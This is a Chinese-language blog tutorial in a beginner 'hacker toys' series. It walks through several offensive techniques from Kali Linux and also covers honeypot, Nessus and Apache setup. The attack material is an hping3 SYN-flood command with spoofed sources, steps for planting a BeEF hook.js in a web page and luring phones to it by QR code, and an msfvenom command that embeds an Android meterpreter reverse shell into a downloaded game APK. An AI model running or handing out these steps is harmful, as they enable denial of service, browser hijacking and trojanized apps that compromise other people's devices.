駭客玩具入門——8、其他攻擊手段

Zaking發表於2023-12-01

1、拒絕服務攻擊

使用某些手段故意佔用某一系統對外服務的有限資源,從而導致其無法正常工作的行為就是拒絕服務攻擊。實際上拒絕服務攻擊並不是一個攻擊方式,它是一類具有相似特徵的攻擊方式的集合。拒絕服務攻擊有以下分類:

1. 資料鏈路層的拒絕服務攻擊

攻擊目標:交換機

集線器:以前的內網都是用集線器,集線器不具備學習記憶功能,多臺機器在通訊的時候,都是將資訊發給所有的機器,如果不是對應的機器接收到,就不做應答。它的缺點是,我們可以很簡單的獲取到整個網路內的所有資訊。

交換機:交換機有學習和記憶的功能,在交換機內部有一個CAM的表,這個表可以記錄交換機每個介面對應的計算機的MAC地址資訊,有了這些資訊,在傳輸資料的時候就可以一對一傳輸。

拒絕服務攻擊利用方法:CAM表容量有限,如果我們在短時間內製造大量的不同源的MAC地址發來的資料包,CAM表就會被佔滿,導致交換機無法正常工作。

2.網路層的拒絕服務攻擊

TCP和UDP就位於這一層,而基於TCP的拒絕服務攻擊,就是大家常說的拒絕服務攻擊。大部分的伺服器都是提供HTTP服務的伺服器,HTTP協議就是TCP提供的支援。基於TCP的拒絕服務攻擊有兩種:

  1. 和目標埠完成三次握手,建立一個完整連結
  2. 只和目標埠完成三次握手的前兩次,建立一個不完整的連結,這種方式最常用。

利用工具:hping3。實驗靶機:Metasploitable2。

命令:hping3 -c 10000 -d 120 -S -w 64 -p 80 --flood --rand-source [目標ip]

3.傳輸層的拒絕服務攻擊

4.基於應用層的拒絕服務攻擊

5.DDOS攻擊

大家常說的DDOS攻擊,翻譯過來就是分散式拒絕服務攻擊,也就是很多的機器同時對目標發起拒絕服務攻擊,這就是為什麼DDOS往往和肉雞這個詞一起出現的原因。

2、用Kali Linux 蜜罐引誘可能的攻擊者進入陷阱

什麼是蜜罐?許多安全專家都喜歡的一個東西就是蜜罐。簡單地說,蜜罐是模擬特定網路攻擊目標的系統。有了蜜罐,管理員可以檢測並記錄對某些服務發起的網路攻擊,以及發起攻擊的IP地址。建立一個蜜罐是相當簡單的,使用Kali Linux和pentbox組合,可以在幾分鐘內啟動和執行一個蜜罐。

可以使用以下命令下載蜜罐:

wget http://downloads.sourceforge.net/project/pentbox18realised/pentbox-1.8.tar.gz

執行pentbox Ruby指令碼:

./pentbox.rb

然後會看到一個選單,在選單中選擇2(用於網路工具),然後選擇3(用於蜜罐)。

然後會讓你選擇快捷設定還是手動設定,如果快捷設定報錯了,那麼可以使用手動設定,比如埠被佔用等。

然後可以用另外一臺電腦來訪問該kali的ip地址,別忘了加埠號。

然後就沒有然後了。

3、Nessus

Nessus是目前全世界最多人使用的系統漏洞掃描和分析工具。

1、安裝

  1. 下載地址:https://www.tenable.com/downloads/nessus?loginAttempted=true。
  2. 下載kali linux的版本。注意要在kali的系統裡的瀏覽器裡下載哦。

  3. 然後,在你下載的那個資料夾裡右鍵開啟終端:

  4. 然後輸入:sudo dpkg -i [安裝包名]。
  5. 開啟服務,命令已經告訴你了。sudo /bin/systemctl start nessusd.service

  6. 開啟瀏覽器,訪問上圖中的連結地址。然後會出現個提示,就跟Windows訪問不安全的地址一樣,點灰色的按鈕,接受就好了。

  7. 點選下一步,輸入郵箱和姓名(隨便寫好伐)。

  8. 然後回車,然後會發給你一封信,信裡有Activation Code,輸入Activation Code

  9. 然後會輸入使用者名稱和密碼。
  10. 然後就會更新軟體,就完事了,當然也可能會失敗。

2、使用方法

暫不介紹,自行百度。

4、Apache服務的使用方法

Apache是世界使用排名第一的web伺服器軟體。它可以執行在幾乎所有廣泛使用的計算機平臺上,由於其跨平臺和安全性被廣泛使用,是最流行的Web伺服器端軟體之一。

執行一個網站,可以作為檔案上傳下載的中轉站。其實我們們之前都玩過了。

啟動apache服務:sudo service apache2 start。

5、掃碼控制

實踐步驟:

  1. 修改虛擬機器的聯網模式為橋接模式
  2. 啟動beef框架,開啟後設定一個你記得住的密碼。

  3. 複製網站模板(隨便百度靜態網站模板,就是靜態的html頁面)到kali中,把hook.js檔案加入到模板的首頁中。

     把這段js指令碼程式碼,放到如下圖所示即可,注意,看到下面紅框裡的<IP>沒有?改成你的主機IP,就完事了。

  4. 把網站模板複製到Apache目錄下:
    • 先把apache目錄中原有的檔案都刪除掉:sudo rm -rf *。
    • 然後把剛才的index.html模板複製到該目錄下,之前學過這命令,不說了
  5. 啟動apache服務。也說過,再不知道回去看。
  6. 將網站首頁的連結製作成二維碼。透過草料二維碼,把連結地址轉換成二維碼就可以了。
  7. 登入beef頁面,地址在這裡:

預設的使用者名稱就是beef,密碼就是剛才你設定的:

就進來了。

  1. 用手機掃描二維碼。
  2. 然後你就可以在瀏覽器的beef標籤裡檢視了。

所以!不要輕易掃碼!!!

6、在軟體中植入Payload

1.首先我下載了一個遊戲,你自己隨便下載。

2.在app中植入payload。啥意思不說了哈,都知道了。

 

sudo msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.199.124 lport=6666 -x /home/zakingwong/game_old.apk R>/home/zakingwong/new.apk

3.然後開啟主控端,進入meterpreter。

4.透過apache把apl傳送到你的安卓手機上。

5.安裝並開啟遊戲。

6.然後,做之前學過的事吧!

7、DirBuster目錄爆破

要相對一個目標站點做滲透測試,首先要搞清楚的就是目標的目錄結構。這個任務可以交給DirBuster來做。DirBuster是一個多執行緒Java應用程式,可以破解Web應用程式伺服器上的目錄和檔名。DirBuster自帶字典檔案,當然我們可以根據收集到的其他資訊,針對性的生成更加好用的字典檔案。

使用方法,要想使用DirBuster只需要簡單的四部操作,實驗靶機是owasp linux伺服器:

  1. 設定目標網站網址(在kali中搜尋DirBuster就能找到了):

     

  2. 設定軟體掃碼的速度,也就是執行緒數。預設為10,我們可以根據自己的需求設定,如果目標站點頻寬不夠且執行緒數太高,會導致目標站點無法正常訪問。拖拽修改即可。

  3. 設定字典檔案。字典可以使我們根據已收集到的資訊對應生成的字典。也可以是dirbuster預設自帶的幾個字典。dirbuster自帶的字典檔案在/usr/share/dirbuster/wordlists/目錄下。

  4. 這些不用動,點start就可以了。

  5. 然後,我們可以在下圖的tabs中檢視各種掃描結果資訊

     

相關文章